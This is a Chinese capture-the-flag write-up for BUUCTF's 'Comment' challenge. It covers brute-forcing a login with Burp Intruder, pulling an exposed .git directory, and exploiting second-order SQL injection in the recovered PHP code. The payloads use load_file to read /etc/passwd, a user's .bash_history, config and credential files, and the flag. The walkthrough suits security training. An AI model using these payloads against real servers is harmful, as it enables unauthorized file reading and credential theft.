[网鼎杯2018] Comment

BUUCTF在线评测，在官网找到Comment这道题

1.破解密码

        1.1发帖界面

才进来，我们点击发帖，随便输入点什么内容。

提交之后我们进入了登录界面，这里显示了又用户名和密码，只不过密码后三位是不知道的

        1.2.使用burpsuite抓包工具，爆破密码

密码后面先随意输入

打开浏览器的代理，和burpsuite的代理，然后刷新浏览器

我们把抓到的包，发送到Intruder模块，在密码后面用$符号包裹一个数值，这个数值就是用来破解的地方

点击上面的payload，设置payload类型为数值型，因为密码后面是三位，我就就从0到1000破解，这些设置好后，就可以开始攻击了

这里也是比较幸运，后面的密码三位的确是数字，然后根据长度的不同，我们已经可以确定666就是后面的那三位数值

2.找漏洞所在

        2.1.先在登录后的界面测试

这里使用了各种常规的闭合等，后没有任何效果，但是，一般的类似于这种，有.git文件可以查看，我们试着查看根路径下面的.git文件。

这里显示为Forbidden，可以知道，是有这个文件的。但是我们怎么拿到这个文件呢？

        2.2.拿取git文件

这里我使用的是dirsearch先扫描网站

python dirsearch.py -u http://e083d9cf-14e5-4da1-b0fa-fb48407b145a.node5.buuoj.cn:81/

这里可以看见，在网站路径下确实存在.git文件，扫描的结果在这可以看见，也可以在dirsearch-master安装路径里去看

既然知道有这么一个文件了，我们就是用githacker把这个文件拿下来，先把dirsearch扫描出来的结果里，把网址路径复制下来

进入GitHacker里面，拉取这个.git文件，关于这里为什么我的拉取路径和扫描的路径不一样，那是因为中途这个靶机断了，只好重来，所以网址有所偏差。

githacker --url http://3102c428-6668-4e83-969e-3c1450eefad4.node5.buuoj.cn:81/.git --output-folder result

2.3复原git文件

可以看见，我们拉取的git文件就是这个write_do.php

可点击查看，很明显可以看出这个代码并不完整。

<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
    break;
case 'comment':
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>

复原git文件，在cmd界面进入到write_do.php的路径来

git log --all

可以看到，head指针指向的是最早一次commit，通过git reset --hard e5b2a2443c2b6d395d06960123142bc91123148c 命令将head指向第一个commit，得到完整的write_do.php

这下代码就完整了

<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
    $category = addslashes($_POST['category']);
    $title = addslashes($_POST['title']);
    $content = addslashes($_POST['content']);
    $sql = "insert into board
            set category = '$category',
                title = '$title',
                content = '$content'";
    $result = mysql_query($sql);
    header("Location: ./index.php");
    break;
case 'comment':
    $bo_id = addslashes($_POST['bo_id']);
    $sql = "select category from board where id='$bo_id'";
    $result = mysql_query($sql);
    $num = mysql_num_rows($result);
    if($num>0){
    $category = mysql_fetch_array($result)['category'];
    $content = addslashes($_POST['content']);
    $sql = "insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id'";
    $result = mysql_query($sql);
    }
    header("Location: ./comment.php?id=$bo_id");
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>

3.寻找注入点

可以看见，这里使用addslashes()对我们提交的数据进行了处理。后台对输入的参数通过addslashes()对预定义字符进行转义，加上\，预定义的字符包括单引号，双引号，反斜杠，NULL。但是放到数据库后会把转义符 \ 去掉（进入数据库后是没有反斜杠的），并存入数据库中。

但是在cmment中，对于category的值从数据库取出来没有进行转义，直接拼接到sql insert语句中，这就存在二次注入的可能。

我们就可以根据下面这个查询语句构建我们的payload，

我们在category里面写入我们的语句,然后提交

查看提交结果详情。

在留言，也就是content参数，输入*/#，闭合前面的本来的content，#用来注释后面的引号

insert into comment
            set category = '0',content=database(),/*',
                content = '*/#',
                bo_id = '$bo_id'

这下我们就找到了二次注入的点了，下面我们就开始注出我们想要的数据了

4.读取文件

使用select load_file(‘文件绝对路径’)来读取文件，这里的路径，我们可以猜想一下，大部分的服务器都是linux系统的，所以我们先以linux系统的文件访问示范一下。

读/etc/init.d下的东西，这里有配置文件路径
?id=1' union select 1,2,load_file('/etc/init.d/httpd')
得到web安装路径
?id=1' union select 1,2,load_file('/etc/apache/conf/httpd.conf')
读取密码文件
?id=1' union select 1,2,load_file('var/www/html/xxx.com/php/conn.inc.php')

4.1读取/etc/passwd文件

a',content=(select (load_file('/etc/passwd'))),/*

 

4.2查看www用户的历史执行命令

读取成功，可以知道www用户（一般和网站操作相关的用户，由中间件创建）的目录是/home/www，可以查询这下面的.bash_history

a',content=(select (load_file('/home/www/.bash_history'))),/*

这里可以看见，www用户进入到tmp目录下，解压了一个html的压缩文件，然后删除了压缩包，将解压了的文件拷贝到了/var/www/html目录下，然后删除了.DS_Store，值得注意的是，他并没有删除/tmp目录下解压出来的.DS_Store文件，所以我们就可以查看

.DS_Store(英文全称 Desktop Services Store)是一种由苹果公司的Mac OS X操作系统所创造的隐藏文件，目的在于存贮目录的自定义属性，例如文件们的图标位置或者是背景色的选择。通过.DS_Store可以知道这个目录里面所有文件的清单。

a', content=(select (load_file('/tmp/html/.DS_Store'))),/*

 

4.3查看文件清单.DS_Store

这儿由于文件太大，不能完全显示，所以我们用十六进制编码，然后找个网站解码就行了。改为payload：

a', content=(select hex(load_file('/tmp/html/.DS_Store'))),/*

我们复制这个，然后解码

看到解码的内容有些乱，我们将解码后的复制到txt文档更容易看清晰，可以看见含有flag的php文件了，这就是我们的目标

4.4读取flag文件

a',content=(select hex(load_file('/var/www/html/flag_8946e1ff1ee3e40f.php'))),/*

解码得到我们需要的flag

5.提交